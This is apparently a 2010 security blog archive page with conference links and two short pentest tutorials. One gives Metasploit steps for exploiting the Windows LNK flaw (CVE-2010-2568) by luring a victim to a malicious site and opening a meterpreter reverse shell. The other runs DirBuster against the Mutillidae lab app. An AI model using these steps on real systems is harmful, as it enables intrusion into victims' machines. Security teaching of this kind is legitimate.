Archive for July, 2010
Blackhat USA 2010 is over now who ever didnt Arrived at Blackhat here is the Archives of PPT and Videos of all the Presentations.
Below are the few Audit checklists which helps in Securing the WebApplication.
Microsoft has been released a Complete Advisory to fix the LNK Vulnerability and a Detailed Guide and Steps have been given to fix it.
so System administrators make sure u follow the below guide and secure from this threat.
Recently there has been detected a new 0 day exploit which takes advantage of Windows incorrectly parses shortcuts so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. this can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV.Recently metasploit have pushed the exploit to the msf module.still there is no patch relased for this vulnerability.
there are 2 ways to exploit this
1)keep these 2 files LNK file and the DLL in the USb stick and run on the victim machine
2)or trick the victim in accessing the maclicious site.
we will use 2 nd method .
3)svn update (update ur msf)
4)set payload windows/meterpreter/reverse_tcp
5)set LHOST 192.168.0.103 (your ip)
6)set LPORT 1427 (any port)
chk out my video to accomplish the above method Exploiting Windows LNK vulnerability (CVE-2010-2568)
A List of Security Conferences and Events Lists Awesome Details Covering the Information Security Economy.
During Web Application Pentest finding the Sensitive directories files and folders is always a quite tough work.
what is DirBuster
DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
now i will be showing how to use Dirbuster to find sensitive directories and files in a web application , for the demo i will be using Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10.
- cd /pentest/web/dirbuster
- root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/
now browse and select the directory bruteforce lists ex: directory-list-1.0.txt.
now run the start button u will see Dirbuster will start bruteforcing the dir and files.
see the results it has found /mutillidae/passwords/accounts.txt
The ekoparty held annually in the Autonomous City of Buenos Aires where attendees, guests, and related specialists from around the world have the opportunity to engage with technological innovation, vulnerabilities and tools in a relaxed atmosphere and knowledge sharing.
All the past and updated Presentations from Jeremiah Grossman.
Rest of the Presentations,Documents and Videos can be found here